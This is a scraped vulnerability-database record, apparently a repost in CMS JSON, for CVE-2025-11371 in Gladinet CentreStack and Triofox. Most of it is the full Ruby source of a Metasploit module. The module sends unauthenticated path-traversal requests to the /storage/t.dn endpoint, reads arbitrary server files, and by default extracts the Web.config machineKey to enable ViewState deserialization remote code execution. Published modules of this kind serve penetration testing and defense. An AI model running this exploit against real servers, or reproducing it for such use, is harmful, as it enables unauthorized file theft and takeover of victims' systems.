{“lastseen”:”2026-02-04T19:28:01″,”description”:”This module exploits a path traversal vulnerability CVE-2025-11371 in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server’s file system. The vulnerability exists in the \/storage\/t.dn endpoint…”,”published”:”2026-02-04T18:58:58″,”modified”:”2026-02-04T18:58:58″,”type”:”metasploit”,”title”:”Gladinet CentreStack\/Triofox Path Traversal”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-GLADINET_STORAGE_PATH_TRAVERSAL_CVE_2025_11371-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-11371″,”CVE-2025-30406″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Auxiliary::Report\\n include Msf::Auxiliary::Gladinet\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Gladinet CentreStack\/Triofox Path Traversal’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a path traversal vulnerability (CVE-2025-11371) in\\n Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read\\n arbitrary files from the server’s file system.\\n\\n The vulnerability exists in the `\/storage\/t.dn` endpoint which does not properly\\n sanitize the `s` parameter, allowing path traversal attacks. This can be used\\n to read sensitive files such as Web.config which contains the machineKey used for\\n ViewState deserialization attacks (CVE-2025-30406).\\n\\n Gladinet CentreStack versions up to 16.10.10408.56683 are vulnerable.\\n Gladinet Triofox versions up to 16.10.10408.56683 are vulnerable.\\n },\\n ‘Author’ =\\u003e [\\n ‘Huntress Team’, # Vulnerability discovery\\n ‘Valentin Lobstein \\u003cchocapikk[at]leakix.net\\u003e’, # Metasploit module\\n ‘Julien Voisin’, # Review\\n ‘jheysel-r7’ # Review\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-11371’],\\n [‘URL’, ‘https:\/\/www.huntress.com\/blog\/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-04-03’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e []\\n },\\n ‘Actions’ =\\u003e [\\n [‘READ_FILE’, { ‘Description’ =\\u003e ‘Read an arbitrary file from the target’ }],\\n [‘EXTRACT_MACHINEKEY’, { ‘Description’ =\\u003e ‘Read Web.config and extract the machineKey for RCE’ }]\\n ],\\n ‘DefaultAction’ =\\u003e ‘EXTRACT_MACHINEKEY’\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘The base path to the Gladinet CentreStack or Triofox application’, ‘\/’]),\\n OptString.new(‘FILEPATH’, [true, ‘The file to read on the target’, ‘Program Files (x86)\\\\\\\\Gladinet Cloud Enterprise\\\\\\\\root\\\\\\\\Web.config’]),\\n OptString.new(‘DEPTH’, [true, ‘Path traversal depth (number of ..\\\\\\\\ sequences)’, ‘..\\\\\\\\..\\\\\\\\..\\\\\\\\’])\\n ])\\n end\\n\\n def build_traversal_path(file_path)\\n # Remove C:\\\\ prefix if present (path traversal doesn’t work with drive letters)\\n normalized_path = file_path.gsub(\/^[A-Z]:\\\\\\\\\/, ”).gsub(\/^[A-Z]:\/, ”)\\n \\”#{datastore[‘DEPTH’]}#{normalized_path.gsub(‘ ‘, ‘+’)}\\”\\n end\\n\\n def send_traversal_request(file_path)\\n traversal_path = build_traversal_path(file_path)\\n\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘storage’, ‘t.dn’),\\n ‘vars_get’ =\\u003e { ‘s’ =\\u003e traversal_path, ‘sid’ =\\u003e ‘1’ },\\n ‘encode_params’ =\\u003e false\\n })\\n end\\n\\n def check\\n version = gladinet_version\\n return Exploit::CheckCode::Detected(‘Gladinet detected but version could not be determined’) if version.nil?\\n\\n rex_version = Rex::Version.new(version)\\n return Exploit::CheckCode::Vulnerable(\\”Path traversal vulnerability confirmed (Build #{version})\\”) if rex_version \\u003c= Rex::Version.new(‘16.10.10408.56683’)\\n\\n Exploit::CheckCode::Detected(\\”Version #{version} detected, attempting path traversal anyway\\”)\\n end\\n\\n def read_file(file_path)\\n print_status(\\”Attempting to read file via path traversal: #{file_path}\\”)\\n\\n res = send_traversal_request(file_path)\\n return nil unless res\\u0026.code == 200\\n\\n res.body\\n end\\n\\n def run\\n case action.name\\n when ‘READ_FILE’\\n run_read_file\\n when ‘EXTRACT_MACHINEKEY’\\n run_extract_machinekey\\n end\\n end\\n\\n def run_read_file\\n file_content = read_file(datastore[‘FILEPATH’])\\n return print_error(‘Failed to read file via path traversal’) if file_content.nil? || file_content.empty?\\n\\n print_good(\\”Successfully read file: #{datastore[‘FILEPATH’]}\\”)\\n print_line\\n print_line(file_content)\\n print_line\\n\\n fname = File.basename(datastore[‘FILEPATH’])\\n path = store_loot(\\n ‘gladinet.file’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n file_content,\\n fname,\\n ‘File read from Gladinet via path traversal (CVE-2025-11371)’\\n )\\n print_good(\\”File saved to: #{path}\\”)\\n end\\n\\n def run_extract_machinekey\\n file_content = read_file(datastore[‘FILEPATH’])\\n return print_error(‘Failed to read file via path traversal’) if file_content.nil? || file_content.empty?\\n\\n print_good(\\”Successfully read file: #{datastore[‘FILEPATH’]}\\”)\\n print_line\\n print_line(file_content)\\n print_line\\n\\n fname = File.basename(datastore[‘FILEPATH’])\\n path = store_loot(\\n ‘gladinet.file’,\\n ‘text\/plain’,\\n datastore[‘RHOST’],\\n file_content,\\n fname,\\n ‘File read from Gladinet via path traversal (CVE-2025-11371)’\\n )\\n print_good(\\”File saved to: #{path}\\”)\\n\\n handle_machinekey_extraction(file_content, datastore[‘FILEPATH’], ‘MachineKey extracted from Gladinet Web.config (CVE-2025-11371)’)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/gladinet_storage_path_traversal_cve_2025_11371.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/gladinet_storage_path_traversal_cve_2025_11371\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-04T19:28:01″,”description”:”This module exploits a path traversal vulnerability CVE-2025-11371 in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server’s…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-39104","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n